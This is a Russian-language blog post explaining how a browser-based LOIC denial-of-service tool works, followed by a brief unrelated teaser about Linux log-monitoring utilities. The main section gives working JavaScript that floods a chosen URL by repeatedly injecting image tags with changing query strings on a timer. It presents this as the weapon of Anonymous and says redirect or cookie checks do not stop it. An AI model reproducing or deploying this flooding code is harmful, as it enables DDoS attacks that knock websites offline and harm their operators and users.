Как устроен online LOIC (Low Orbit Ion Cannon)

29.04.2017 08:55

JS LOIC - это главное оружие ананимуса. Устроен он до гениальности просто.

Для нетерпеливых, готовый результат:

Статус: выключен

Как оно работает?

Если мы добавим в dom дерево картинку, src которой будет вести не на файл изображения, а на Html страницу, то запрос всё равно будет выполнен:

<img src="http://example.com/any_page">

Загруженный в img контент будет загружен со всеми редиректами. По этому проверка на редиректы/cookie против таких атак не работает.

Код

Нам нужен элемент на странице, куда мы будем закидывать картинки:

<div id="imgkeeper"></div>

Затем нужны несколько глобальных переменных:

var iterator = 0; // Счётчик картинок
var generation = 2; // поколение картинок
var workInterval; // сюда положим рабочий интервал

И главная функция:

function createRequests(url, count) {
  generation ++; // увеличиваем поколение
  for(let i=0; i<count; i++) { // создаём столько картинок, сколько передано в параметрах
    iterator ++; // увеличиваем общий счётчик картинок
    // Создаём саму картинку
    let newElement = `<img src="${url}?id=${iterator}" class="generation_${generation}" />`;
    $('#imgkeeper').append(newElement); // добавляем картинку в dom дерево
  }
  // Удаляем старое поколение картинок, чтобы браузер не тормозил
  $(`.generation_${generation - 2}`).remove(); 
}

Вот и всё. Дальше на кнопку start вешаем setInterval, на стоп очищение интервала и LOIC готов.



Мониторинг linux систем, консольные утилиты

Все знают про такие утилиты как top, tptraf, netstat. Но есть ещё много, не менее (а иногда и более) полезных утилит.

logstalgia - Красивый log viewer

Это тот случай, когда просмотр логов превращается в очень увлекательное занятие. Я могу часами залипать в неё.


(0) Комментариев